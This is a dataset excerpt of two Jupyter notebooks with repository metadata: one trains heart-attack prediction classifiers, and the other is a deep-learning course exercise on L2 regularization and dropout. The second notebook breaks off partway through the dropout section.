"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2c30d16c6591fa9a2243ca30e9fd6ff93ca2c7 | 20,341 | ipynb | Jupyter Notebook | model of Heart Attack.ipynb | rjnp2/Heart_Attack-EDA-Prediction | 17bc34d6e41f4e78adb34ec7a37ddcc20bfff016 | [
"MIT"
] | 3 | 2021-06-05T15:07:08.000Z | 2021-07-29T14:23:23.000Z | model of Heart Attack.ipynb | rjnp2/Heart_Attack-EDA-Prediction | 17bc34d6e41f4e78adb34ec7a37ddcc20bfff016 | [
"MIT"
] | null | null | null | model of Heart Attack.ipynb | rjnp2/Heart_Attack-EDA-Prediction | 17bc34d6e41f4e78adb34ec7a37ddcc20bfff016 | [
"MIT"
] | null | null | null | 27.525034 | 122 | 0.413795 | [
[
[
"## 1. Importing the required libraries for EDA",
"_____no_output_____"
]
],
[
[
"import pandas as pd \nimport numpy as np # For mathematical calculations \nimport seaborn as sns # For data visualization \nimport matplotlib.pyplot as plt # For plotting graphs \n%matplotlib inline \nsns.set(color_codes=True)\nimport warnings \nwarnings.filterwarnings(\"ignore\")\n\n# Scaling\nfrom sklearn.preprocessing import RobustScaler\n\n# Train Test Split\nfrom sklearn.model_selection import train_test_split\n\n# Models\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\n\n# Metrics\nfrom sklearn.metrics import accuracy_score, classification_report\n\n# Cross Validation\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\n\nprint('Packages imported...')",
"Packages imported...\n"
]
],
[
[
"## Reading Data",
"_____no_output_____"
]
],
[
[
"data=pd.read_csv(\"heart.csv\")\ndata.head()",
"_____no_output_____"
],
[
"data.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 303 entries, 0 to 302\nData columns (total 14 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 age 303 non-null int64 \n 1 sex 303 non-null int64 \n 2 cp 303 non-null int64 \n 3 trtbps 303 non-null int64 \n 4 chol 303 non-null int64 \n 5 fbs 303 non-null int64 \n 6 restecg 303 non-null int64 \n 7 thalachh 303 non-null int64 \n 8 exng 303 non-null int64 \n 9 oldpeak 303 non-null float64\n 10 slp 303 non-null int64 \n 11 caa 303 non-null int64 \n 12 thall 303 non-null int64 \n 13 output 303 non-null int64 \ndtypes: float64(1), int64(13)\nmemory usage: 33.3 KB\n"
],
[
"Q1 = data.quantile(0.25).loc['chol']\nQ3 = data.quantile(0.75).loc['chol']\nIQR = Q3 - Q1\nprint(IQR,data.shape)",
"63.5 (303, 14)\n"
],
[
"data = data[~((data.chol < (Q1 - 1.5 * IQR)) | (data.chol > (Q3 + 1.5 * IQR)))]\ndata.shape",
"_____no_output_____"
]
],
[
[
"## Scaling and Encoding features",
"_____no_output_____"
]
],
[
[
"# define the columns to be encoded and scaled\ncat_cols = ['sex','exng','caa','cp']\ncon_cols = [\"age\",\"trtbps\",\"chol\",\"thalachh\"]\n\n# creating a copy of data\ndf1 = data[cat_cols + con_cols]\n\n# encoding the categorical columns\nX = pd.get_dummies(df1, columns = cat_cols, drop_first = True)\n\n# defining the features and target\ny = data[['output']]\n\n# instantiating the scaler\nscaler = RobustScaler()\n\n# scaling the continuous featuree\nX[con_cols] = scaler.fit_transform(X[con_cols])\nprint(\"The first 5 rows of X are\")\nX.head()",
"The first 5 rows of X are\n"
],
[
"# Train and test split\n\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size = 0.2, random_state = 42)\nprint(\"The shape of X_train is \", X_train.shape)\nprint(\"The shape of X_test is \",X_test.shape)\nprint(\"The shape of y_train is \",y_train.shape)\nprint(\"The shape of y_test is \",y_test.shape)",
"The shape of X_train is (242, 13)\nThe shape of X_test is (61, 13)\nThe shape of y_train is (242, 1)\nThe shape of y_test is (61, 1)\n"
]
],
[
[
"## Modeling\n\n### 1. Support Vector Machines",
"_____no_output_____"
]
],
[
[
"# instantiating the object and fitting\nclf = SVC(kernel='linear', C=1, random_state=42).fit(X_train,y_train)\n\n# predicting the values\ny_pred = clf.predict(X_test)\n\n# printing the test accuracy\nprint(\"The test accuracy score of SVM is \", accuracy_score(y_test, y_pred))",
"The test accuracy score of SVM is 0.8688524590163934\n"
]
],
[
[
"## Hyperparameter tuning of SVC",
"_____no_output_____"
]
],
[
[
"# instantiating the object\nsvm = SVC()\n\n# setting a grid - not so extensive\nparameters = {\"C\":np.arange(1,10,1),'gamma':[0.00001,0.00005, 0.0001,0.0005,0.001,0.005,0.01,0.05,0.1,0.5,1,5]}\n\n# instantiating the GridSearchCV object\nsearcher = GridSearchCV(svm, parameters)\n\n# fitting the object\nsearcher.fit(X_train, y_train)\n\n# the scores\nprint(\"The best params are :\", searcher.best_params_)\nprint(\"The best score is :\", searcher.best_score_)\n\n# predicting the values\ny_pred = searcher.predict(X_test)\n\n# printing the test accuracy\nprint(\"The test accuracy score of SVM after hyper-parameter tuning is \", accuracy_score(y_test, y_pred))",
"The best params are : {'C': 5, 'gamma': 1}\nThe best score is : 0.7935374149659864\nThe test accuracy score of SVM after hyper-parameter tuning is 0.7868852459016393\n"
]
],
[
[
"## Decision Tree",
"_____no_output_____"
]
],
[
[
"# instantiating the object\ndt = DecisionTreeClassifier(random_state = 42)\n\n# fitting the model\ndt.fit(X_train, y_train)\n\n# calculating the predictions\ny_pred = dt.predict(X_test)\n\n# printing the test accuracy\nprint(\"The test accuracy score of Decision Tree is \", accuracy_score(y_test, y_pred))",
"The test accuracy score of Decision Tree is 0.7049180327868853\n"
]
],
[
[
"## Random Forest",
"_____no_output_____"
]
],
[
[
"# instantiating the object\nrf = RandomForestClassifier()\n\n# fitting the model\nrf.fit(X_train, y_train)\n\n# calculating the predictions\ny_pred = dt.predict(X_test)\n\n# printing the test accuracy\nprint(\"The test accuracy score of Random Forest is \", accuracy_score(y_test, y_pred))\n",
"The test accuracy score of Random Forest is 0.7049180327868853\n"
]
],
[
[
" ## Gradient Boosting Classifier",
"_____no_output_____"
]
],
[
[
"# instantiate the classifier\ngbt = GradientBoostingClassifier(n_estimators = 300,max_depth=5,subsample=0.8,max_features=0.2,random_state=42)\n\n# fitting the model\ngbt.fit(X_train,y_train)\n\n# predicting values\ny_pred = gbt.predict(X_test)\nprint(\"The test accuracy score of Gradient Boosting Classifier is \", accuracy_score(y_test, y_pred))",
"The test accuracy score of Gradient Boosting Classifier is 0.8032786885245902\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2c32aa7a672daf2d94a00a6e6a7e8e499919be | 273,875 | ipynb | Jupyter Notebook | module_2/Regularization_v2a.ipynb | Ry-8001/Machine-Deep-Learning | 243f506ff0c8cfedda12d72761d34b058f84ea7b | [
"MIT"
] | null | null | null | module_2/Regularization_v2a.ipynb | Ry-8001/Machine-Deep-Learning | 243f506ff0c8cfedda12d72761d34b058f84ea7b | [
"MIT"
] | null | null | null | module_2/Regularization_v2a.ipynb | Ry-8001/Machine-Deep-Learning | 243f506ff0c8cfedda12d72761d34b058f84ea7b | [
"MIT"
] | null | null | null | 241.725508 | 56,104 | 0.891724 | [
[
[
"# Regularization\n\nWelcome to the second assignment of this week. Deep Learning models have so much flexibility and capacity that **overfitting can be a serious problem**, if the training dataset is not big enough. Sure it does well on the training set, but the learned network **doesn't generalize to new examples** that it has never seen!\n\n**You will learn to:** Use regularization in your deep learning models.\n\nLet's first import the packages you are going to use.",
"_____no_output_____"
],
[
"### <font color='darkblue'> Updates to Assignment <font>\n\n#### If you were working on a previous version\n* The current notebook filename is version \"2a\". \n* You can find your work in the file directory as version \"2\".\n* To see the file directory, click on the Coursera logo at the top left of the notebook.\n\n#### List of Updates\n* Clarified explanation of 'keep_prob' in the text description.\n* Fixed a comment so that keep_prob and 1-keep_prob add up to 100%\n* Updated print statements and 'expected output' for easier visual comparisons.",
"_____no_output_____"
]
],
[
[
"# import packages\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom reg_utils import sigmoid, relu, plot_decision_boundary, initialize_parameters, load_2D_dataset, predict_dec\nfrom reg_utils import compute_cost, predict, forward_propagation, backward_propagation, update_parameters\nimport sklearn\nimport sklearn.datasets\nimport scipy.io\nfrom testCases import *\n\n%matplotlib inline\nplt.rcParams['figure.figsize'] = (7.0, 4.0) # set default size of plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'",
"_____no_output_____"
]
],
[
[
"**Problem Statement**: You have just been hired as an AI expert by the French Football Corporation. They would like you to recommend positions where France's goal keeper should kick the ball so that the French team's players can then hit it with their head. \n\n<img src=\"images/field_kiank.png\" style=\"width:600px;height:350px;\">\n<caption><center> <u> **Figure 1** </u>: **Football field**<br> The goal keeper kicks the ball in the air, the players of each team are fighting to hit the ball with their head </center></caption>\n\n\nThey give you the following 2D dataset from France's past 10 games.",
"_____no_output_____"
]
],
[
[
"train_X, train_Y, test_X, test_Y = load_2D_dataset()",
"_____no_output_____"
]
],
[
[
"Each dot corresponds to a position on the football field where a football player has hit the ball with his/her head after the French goal keeper has shot the ball from the left side of the football field.\n- If the dot is blue, it means the French player managed to hit the ball with his/her head\n- If the dot is red, it means the other team's player hit the ball with their head\n\n**Your goal**: Use a deep learning model to find the positions on the field where the goalkeeper should kick the ball.",
"_____no_output_____"
],
[
"**Analysis of the dataset**: This dataset is a little noisy, but it looks like a diagonal line separating the upper left half (blue) from the lower right half (red) would work well. \n\nYou will first try a non-regularized model. Then you'll learn how to regularize it and decide which model you will choose to solve the French Football Corporation's problem. ",
"_____no_output_____"
],
[
"## 1 - Non-regularized model\n\nYou will use the following neural network (already implemented for you below). This model can be used:\n- in *regularization mode* -- by setting the `lambd` input to a non-zero value. We use \"`lambd`\" instead of \"`lambda`\" because \"`lambda`\" is a reserved keyword in Python. \n- in *dropout mode* -- by setting the `keep_prob` to a value less than one\n\nYou will first try the model without any regularization. Then, you will implement:\n- *L2 regularization* -- functions: \"`compute_cost_with_regularization()`\" and \"`backward_propagation_with_regularization()`\"\n- *Dropout* -- functions: \"`forward_propagation_with_dropout()`\" and \"`backward_propagation_with_dropout()`\"\n\nIn each part, you will run this model with the correct inputs so that it calls the functions you've implemented. Take a look at the code below to familiarize yourself with the model.",
"_____no_output_____"
]
],
[
[
"def model(X, Y, learning_rate = 0.3, num_iterations = 30000, print_cost = True, lambd = 0, keep_prob = 1):\n \"\"\"\n Implements a three-layer neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SIGMOID.\n \n Arguments:\n X -- input data, of shape (input size, number of examples)\n Y -- true \"label\" vector (1 for blue dot / 0 for red dot), of shape (output size, number of examples)\n learning_rate -- learning rate of the optimization\n num_iterations -- number of iterations of the optimization loop\n print_cost -- If True, print the cost every 10000 iterations\n lambd -- regularization hyperparameter, scalar\n keep_prob - probability of keeping a neuron active during drop-out, scalar.\n \n Returns:\n parameters -- parameters learned by the model. They can then be used to predict.\n \"\"\"\n \n grads = {}\n costs = [] # to keep track of the cost\n m = X.shape[1] # number of examples\n layers_dims = [X.shape[0], 20, 3, 1]\n \n # Initialize parameters dictionary.\n parameters = initialize_parameters(layers_dims)\n\n # Loop (gradient descent)\n\n for i in range(0, num_iterations):\n\n # Forward propagation: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID.\n if keep_prob == 1:\n a3, cache = forward_propagation(X, parameters)\n elif keep_prob < 1:\n a3, cache = forward_propagation_with_dropout(X, parameters, keep_prob)\n \n # Cost function\n if lambd == 0:\n cost = compute_cost(a3, Y)\n else:\n cost = compute_cost_with_regularization(a3, Y, parameters, lambd)\n \n # Backward propagation.\n assert(lambd==0 or keep_prob==1) # it is possible to use both L2 regularization and dropout, \n # but this assignment will only explore one at a time\n if lambd == 0 and keep_prob == 1:\n grads = backward_propagation(X, Y, cache)\n elif lambd != 0:\n grads = backward_propagation_with_regularization(X, Y, cache, lambd)\n elif keep_prob < 1:\n grads = backward_propagation_with_dropout(X, Y, cache, keep_prob)\n \n # Update parameters.\n parameters = update_parameters(parameters, grads, learning_rate)\n \n # Print the loss every 10000 iterations\n if print_cost and i % 10000 == 0:\n print(\"Cost after iteration {}: {}\".format(i, cost))\n if print_cost and i % 1000 == 0:\n costs.append(cost)\n \n # plot the cost\n plt.plot(costs)\n plt.ylabel('cost')\n plt.xlabel('iterations (x1,000)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n \n return parameters",
"_____no_output_____"
]
],
[
[
"Let's train the model without any regularization, and observe the accuracy on the train/test sets.",
"_____no_output_____"
]
],
[
[
"parameters = model(train_X, train_Y)\nprint (\"On the training set:\")\npredictions_train = predict(train_X, train_Y, parameters)\nprint (\"On the test set:\")\npredictions_test = predict(test_X, test_Y, parameters)",
"Cost after iteration 0: 0.6557412523481002\nCost after iteration 10000: 0.16329987525724213\nCost after iteration 20000: 0.13851642423253263\n"
]
],
[
[
"The train accuracy is 94.8% while the test accuracy is 91.5%. This is the **baseline model** (you will observe the impact of regularization on this model). Run the following code to plot the decision boundary of your model.",
"_____no_output_____"
]
],
[
[
"plt.title(\"Model without regularization\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)",
"_____no_output_____"
]
],
[
[
"The non-regularized model is obviously overfitting the training set. It is fitting the noisy points! Lets now look at two techniques to reduce overfitting.",
"_____no_output_____"
],
[
"## 2 - L2 Regularization\n\nThe standard way to avoid overfitting is called **L2 regularization**. It consists of appropriately modifying your cost function, from:\n$$J = -\\frac{1}{m} \\sum\\limits_{i = 1}^{m} \\large{(}\\small y^{(i)}\\log\\left(a^{[L](i)}\\right) + (1-y^{(i)})\\log\\left(1- a^{[L](i)}\\right) \\large{)} \\tag{1}$$\nTo:\n$$J_{regularized} = \\small \\underbrace{-\\frac{1}{m} \\sum\\limits_{i = 1}^{m} \\large{(}\\small y^{(i)}\\log\\left(a^{[L](i)}\\right) + (1-y^{(i)})\\log\\left(1- a^{[L](i)}\\right) \\large{)} }_\\text{cross-entropy cost} + \\underbrace{\\frac{1}{m} \\frac{\\lambda}{2} \\sum\\limits_l\\sum\\limits_k\\sum\\limits_j W_{k,j}^{[l]2} }_\\text{L2 regularization cost} \\tag{2}$$\n\nLet's modify your cost and observe the consequences.\n\n**Exercise**: Implement `compute_cost_with_regularization()` which computes the cost given by formula (2). To calculate $\\sum\\limits_k\\sum\\limits_j W_{k,j}^{[l]2}$ , use :\n```python\nnp.sum(np.square(Wl))\n```\nNote that you have to do this for $W^{[1]}$, $W^{[2]}$ and $W^{[3]}$, then sum the three terms and multiply by $ \\frac{1}{m} \\frac{\\lambda}{2} $.",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: compute_cost_with_regularization\n\ndef compute_cost_with_regularization(A3, Y, parameters, lambd):\n \"\"\"\n Implement the cost function with L2 regularization. See formula (2) above.\n \n Arguments:\n A3 -- post-activation, output of forward propagation, of shape (output size, number of examples)\n Y -- \"true\" labels vector, of shape (output size, number of examples)\n parameters -- python dictionary containing parameters of the model\n \n Returns:\n cost - value of the regularized loss function (formula (2))\n \"\"\"\n m = Y.shape[1]\n W1 = parameters[\"W1\"]\n W2 = parameters[\"W2\"]\n W3 = parameters[\"W3\"]\n \n cross_entropy_cost = compute_cost(A3, Y) # This gives you the cross-entropy part of the cost\n \n ### START CODE HERE ### (approx. 1 line)\n L2_regularization_cost=(np.sum(np.square(W1))+np.sum(np.square(W2))+np.sum(np.square(W3)))*lambd/(2*m)\n ### END CODER HERE ###\n \n cost = cross_entropy_cost + L2_regularization_cost\n \n return cost",
"_____no_output_____"
],
[
"A3, Y_assess, parameters = compute_cost_with_regularization_test_case()\n\nprint(\"cost = \" + str(compute_cost_with_regularization(A3, Y_assess, parameters, lambd = 0.1)))",
"cost = 1.78648594516\n"
]
],
[
[
"**Expected Output**: \n\n<table> \n <tr>\n <td>\n **cost**\n </td>\n <td>\n 1.78648594516\n </td>\n \n </tr>\n\n</table> ",
"_____no_output_____"
],
[
"Of course, because you changed the cost, you have to change backward propagation as well! All the gradients have to be computed with respect to this new cost. \n\n**Exercise**: Implement the changes needed in backward propagation to take into account regularization. The changes only concern dW1, dW2 and dW3. For each, you have to add the regularization term's gradient ($\\frac{d}{dW} ( \\frac{1}{2}\\frac{\\lambda}{m} W^2) = \\frac{\\lambda}{m} W$).",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: backward_propagation_with_regularization\n\ndef backward_propagation_with_regularization(X, Y, cache, lambd):\n \"\"\"\n Implements the backward propagation of our baseline model to which we added an L2 regularization.\n \n Arguments:\n X -- input dataset, of shape (input size, number of examples)\n Y -- \"true\" labels vector, of shape (output size, number of examples)\n cache -- cache output from forward_propagation()\n lambd -- regularization hyperparameter, scalar\n \n Returns:\n gradients -- A dictionary with the gradients with respect to each parameter, activation and pre-activation variables\n \"\"\"\n \n m = X.shape[1]\n (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n \n dZ3 = A3 - Y\n \n ### START CODE HERE ### (approx. 1 line)\n dW3 = ([email protected] )/m + lambd/m*W3\n ### END CODE HERE ###\n db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)\n \n dA2 = np.dot(W3.T, dZ3)\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n ### START CODE HERE ### (approx. 1 line)\n dW2 = ([email protected] )/m + lambd/m*W2\n ### END CODE HERE ###\n db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)\n \n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n ### START CODE HERE ### (approx. 1 line)\n dW1 = ([email protected] )/m + lambd/m*W1\n ### END CODE HERE ###\n db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)\n \n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1, \n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients",
"_____no_output_____"
],
[
"X_assess, Y_assess, cache = backward_propagation_with_regularization_test_case()\n\ngrads = backward_propagation_with_regularization(X_assess, Y_assess, cache, lambd = 0.7)\nprint (\"dW1 = \\n\"+ str(grads[\"dW1\"]))\nprint (\"dW2 = \\n\"+ str(grads[\"dW2\"]))\nprint (\"dW3 = \\n\"+ str(grads[\"dW3\"]))",
"dW1 = \n[[-0.25604646 0.12298827 -0.28297129]\n [-0.17706303 0.34536094 -0.4410571 ]]\ndW2 = \n[[ 0.79276486 0.85133918]\n [-0.0957219 -0.01720463]\n [-0.13100772 -0.03750433]]\ndW3 = \n[[-1.77691347 -0.11832879 -0.09397446]]\n"
]
],
[
[
"**Expected Output**:\n\n```\ndW1 = \n[[-0.25604646 0.12298827 -0.28297129]\n [-0.17706303 0.34536094 -0.4410571 ]]\ndW2 = \n[[ 0.79276486 0.85133918]\n [-0.0957219 -0.01720463]\n [-0.13100772 -0.03750433]]\ndW3 = \n[[-1.77691347 -0.11832879 -0.09397446]]\n```",
"_____no_output_____"
],
[
"Let's now run the model with L2 regularization $(\\lambda = 0.7)$. The `model()` function will call: \n- `compute_cost_with_regularization` instead of `compute_cost`\n- `backward_propagation_with_regularization` instead of `backward_propagation`",
"_____no_output_____"
]
],
[
[
"parameters = model(train_X, train_Y, lambd = 0.7)\nprint (\"On the train set:\")\npredictions_train = predict(train_X, train_Y, parameters)\nprint (\"On the test set:\")\npredictions_test = predict(test_X, test_Y, parameters)",
"Cost after iteration 0: 0.6974484493131264\nCost after iteration 10000: 0.2684918873282239\nCost after iteration 20000: 0.2680916337127301\n"
]
],
[
[
"Congrats, the test set accuracy increased to 93%. You have saved the French football team!\n\nYou are not overfitting the training data anymore. Let's plot the decision boundary.",
"_____no_output_____"
]
],
[
[
"plt.title(\"Model with L2-regularization\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)",
"_____no_output_____"
]
],
[
[
"**Observations**:\n- The value of $\\lambda$ is a hyperparameter that you can tune using a dev set.\n- L2 regularization makes your decision boundary smoother. If $\\lambda$ is too large, it is also possible to \"oversmooth\", resulting in a model with high bias.\n\n**What is L2-regularization actually doing?**:\n\nL2-regularization relies on the assumption that a model with small weights is simpler than a model with large weights. Thus, by penalizing the square values of the weights in the cost function you drive all the weights to smaller values. It becomes too costly for the cost to have large weights! This leads to a smoother model in which the output changes more slowly as the input changes. \n\n<font color='blue'>\n**What you should remember** -- the implications of L2-regularization on:\n- The cost computation:\n - A regularization term is added to the cost\n- The backpropagation function:\n - There are extra terms in the gradients with respect to weight matrices\n- Weights end up smaller (\"weight decay\"): \n - Weights are pushed to smaller values.",
"_____no_output_____"
],
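[
"As a rough sketch of why this produces \"weight decay\", consider the update rule implied by the code above: the regularized gradient is $dW^{[l]} = (\\text{backprop term}) + \\frac{\\lambda}{m} W^{[l]}$, so the gradient descent step becomes $W^{[l]} := W^{[l]} - \\alpha \\, dW^{[l]} = \\left(1 - \\frac{\\alpha\\lambda}{m}\\right) W^{[l]} - \\alpha \\, (\\text{backprop term})$. Each iteration therefore multiplies the weights by a factor slightly smaller than 1 before applying the usual gradient step, which is exactly the shrinkage toward smaller weights described above.",
"_____no_output_____"
],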
[
"## 3 - Dropout\n\nFinally, **dropout** is a widely used regularization technique that is specific to deep learning. \n**It randomly shuts down some neurons in each iteration.** Watch these two videos to see what this means!\n\n<!--\nTo understand drop-out, consider this conversation with a friend:\n- Friend: \"Why do you need all these neurons to train your network and classify images?\". \n- You: \"Because each neuron contains a weight and can learn specific features/details/shape of an image. The more neurons I have, the more featurse my model learns!\"\n- Friend: \"I see, but are you sure that your neurons are learning different features and not all the same features?\"\n- You: \"Good point... Neurons in the same layer actually don't talk to each other. It should be definitly possible that they learn the same image features/shapes/forms/details... which would be redundant. There should be a solution.\"\n!--> \n\n\n<center>\n<video width=\"620\" height=\"440\" src=\"images/dropout1_kiank.mp4\" type=\"video/mp4\" controls>\n</video>\n</center>\n<br>\n<caption><center> <u> Figure 2 </u>: Drop-out on the second hidden layer. <br> At each iteration, you shut down (= set to zero) each neuron of a layer with probability $1 - keep\\_prob$ or keep it with probability $keep\\_prob$ (50% here). The dropped neurons don't contribute to the training in both the forward and backward propagations of the iteration. </center></caption>\n\n<center>\n<video width=\"620\" height=\"440\" src=\"images/dropout2_kiank.mp4\" type=\"video/mp4\" controls>\n</video>\n</center>\n\n<caption><center> <u> Figure 3 </u>: Drop-out on the first and third hidden layers. <br> $1^{st}$ layer: we shut down on average 40% of the neurons. $3^{rd}$ layer: we shut down on average 20% of the neurons. </center></caption>\n\n\nWhen you shut some neurons down, you actually modify your model. The idea behind drop-out is that at each iteration, you train a different model that uses only a subset of your neurons. With dropout, your neurons thus become less sensitive to the activation of one other specific neuron, because that other neuron might be shut down at any time. \n\n### 3.1 - Forward propagation with dropout\n\n**Exercise**: Implement the forward propagation with dropout. You are using a 3 layer neural network, and will add dropout to the first and second hidden layers. We will not apply dropout to the input layer or output layer. \n\n**Instructions**:\nYou would like to shut down some neurons in the first and second layers. To do that, you are going to carry out 4 Steps:\n1. In lecture, we dicussed creating a variable $d^{[1]}$ with the same shape as $a^{[1]}$ using `np.random.rand()` to randomly get numbers between 0 and 1. Here, you will use a vectorized implementation, so create a random matrix $D^{[1]} = [d^{[1](1)} d^{[1](2)} ... d^{[1](m)}] $ of the same dimension as $A^{[1]}$.\n2. Set each entry of $D^{[1]}$ to be 1 with probability (`keep_prob`), and 0 otherwise.\n\n**Hint:** Let's say that keep_prob = 0.8, which means that we want to keep about 80% of the neurons and drop out about 20% of them. 
We want to generate a vector that has 1's and 0's, where about 80% of them are 1 and about 20% are 0.\nThis python statement: \n`X = (X < keep_prob).astype(int)` \n\nis conceptually the same as this if-else statement (for the simple case of a one-dimensional array) :\n\n```\nfor i,v in enumerate(x):\n if v < keep_prob:\n x[i] = 1\n else: # v >= keep_prob\n x[i] = 0\n```\nNote that the `X = (X < keep_prob).astype(int)` works with multi-dimensional arrays, and the resulting output preserves the dimensions of the input array.\n\nAlso note that without using `.astype(int)`, the result is an array of booleans `True` and `False`, which Python automatically converts to 1 and 0 if we multiply it with numbers. (However, it's better practice to convert data into the data type that we intend, so try using `.astype(int)`.)\n\n3. Set $A^{[1]}$ to $A^{[1]} * D^{[1]}$. (You are shutting down some neurons). You can think of $D^{[1]}$ as a mask, so that when it is multiplied with another matrix, it shuts down some of the values.\n4. Divide $A^{[1]}$ by `keep_prob`. By doing this you are assuring that the result of the cost will still have the same expected value as without drop-out. (This technique is also called inverted dropout.)",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: forward_propagation_with_dropout\n\ndef forward_propagation_with_dropout(X, parameters, keep_prob = 0.5):\n \"\"\"\n Implements the forward propagation: LINEAR -> RELU + DROPOUT -> LINEAR -> RELU + DROPOUT -> LINEAR -> SIGMOID.\n \n Arguments:\n X -- input dataset, of shape (2, number of examples)\n parameters -- python dictionary containing your parameters \"W1\", \"b1\", \"W2\", \"b2\", \"W3\", \"b3\":\n W1 -- weight matrix of shape (20, 2)\n b1 -- bias vector of shape (20, 1)\n W2 -- weight matrix of shape (3, 20)\n b2 -- bias vector of shape (3, 1)\n W3 -- weight matrix of shape (1, 3)\n b3 -- bias vector of shape (1, 1)\n keep_prob - probability of keeping a neuron active during drop-out, scalar\n \n Returns:\n A3 -- last activation value, output of the forward propagation, of shape (1,1)\n cache -- tuple, information stored for computing the backward propagation\n \"\"\"\n \n np.random.seed(1)\n \n # retrieve parameters\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n W3 = parameters[\"W3\"]\n b3 = parameters[\"b3\"]\n \n # LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID\n Z1 = np.dot(W1, X) + b1\n A1 = relu(Z1)\n ### START CODE HERE ### (approx. 4 lines) # Steps 1-4 below correspond to the Steps 1-4 described above. \n D1 = np.random.rand(A1.shape[0],A1.shape[1]) # Step 1: initialize matrix D1 = np.random.rand(..., ...)\n D1=(D1< keep_prob).astype(int) # Step 2: convert entries of D1 to 0 or 1 (using keep_prob as the threshold)\n A1=A1*D1 \n A1=A1/keep_prob # Step 4: scale the value of neurons that haven't been shut down\n ### END CODE HERE ###\n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n ### START CODE HERE ### (approx. 4 lines)\n D2 = np.random.rand(A2.shape[0],A2.shape[1]) # Step 1: initialize matrix D2 = np.random.rand(..., ...)\n D2=(D2< keep_prob).astype(int) # Step 2: convert entries of D2 to 0 or 1 (using keep_prob as the threshold)\n A2=A2*D2 # Step 3: shut down some neurons of A2\n A2=A2/keep_prob # Step 4: scale the value of neurons that haven't been shut down\n ### END CODE HERE ###\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n \n cache = (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3)\n \n return A3, cache",
"_____no_output_____"
],
[
"X_assess, parameters = forward_propagation_with_dropout_test_case()\n\nA3, cache = forward_propagation_with_dropout(X_assess, parameters, keep_prob = 0.7)\nprint (\"A3 = \" + str(A3))",
"A3 = [[ 0.36974721 0.00305176 0.04565099 0.49683389 0.36974721]]\n"
]
],
[
[
"**Expected Output**: \n\n<table> \n <tr>\n <td>\n **A3**\n </td>\n <td>\n [[ 0.36974721 0.00305176 0.04565099 0.49683389 0.36974721]]\n </td>\n \n </tr>\n\n</table> ",
"_____no_output_____"
],
[
"### 3.2 - Backward propagation with dropout\n\n**Exercise**: Implement the backward propagation with dropout. As before, you are training a 3 layer network. Add dropout to the first and second hidden layers, using the masks $D^{[1]}$ and $D^{[2]}$ stored in the cache. \n\n**Instruction**:\nBackpropagation with dropout is actually quite easy. You will have to carry out 2 Steps:\n1. You had previously shut down some neurons during forward propagation, by applying a mask $D^{[1]}$ to `A1`. In backpropagation, you will have to shut down the same neurons, by reapplying the same mask $D^{[1]}$ to `dA1`. \n2. During forward propagation, you had divided `A1` by `keep_prob`. In backpropagation, you'll therefore have to divide `dA1` by `keep_prob` again (the calculus interpretation is that if $A^{[1]}$ is scaled by `keep_prob`, then its derivative $dA^{[1]}$ is also scaled by the same `keep_prob`).\n",
"_____no_output_____"
]
],
[
[
